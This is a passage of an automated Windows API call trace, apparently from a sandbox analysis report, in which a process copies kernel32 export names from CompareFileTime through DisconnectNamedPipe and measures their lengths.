lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.611] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.611] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.611] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.611] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.611] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.611] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.611] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.611] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.611] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.611] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.611] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.611] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.611] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.611] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.612] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.612] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.612] lstrlenA (lpString="COPYFILEA") returned 9 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.612] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.612] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.612] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.612] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.612] lstrlenA (lpString="COPYFILEW") returned 9 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.612] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.612] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.612] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.612] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.612] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.613] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.613] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.613] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.613] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.613] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.613] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.613] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.613] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.613] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.613] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.613] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.613] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.613] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.614] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.614] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.614] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.614] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.614] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.614] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.614] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.614] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.614] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.614] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.614] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.614] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.614] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.614] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.614] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.614] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.614] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.614] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.614] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.615] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.615] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.615] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.615] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.615] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.615] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.615] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.615] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.615] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.615] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.615] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.615] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.615] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.615] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.615] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.615] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.615] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.615] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.615] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.616] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.616] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.616] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.616] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.616] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.616] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.616] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.616] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.616] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.616] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.616] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.616] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.616] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.616] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.616] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.616] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.616] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.616] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.616] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.617] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.617] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.617] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.617] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.617] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.617] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.617] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.617] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.617] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.617] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.617] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.617] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.617] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.617] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.617] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.617] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.617] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.617] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.617] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.617] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.618] lstrlenA (lpString="DELETEATOM") returned 10 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.618] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.618] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.618] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.618] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.618] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.618] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.618] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.618] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.618] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.618] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.618] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.618] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.618] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.618] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.618] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.618] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.618] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.618] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.619] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" 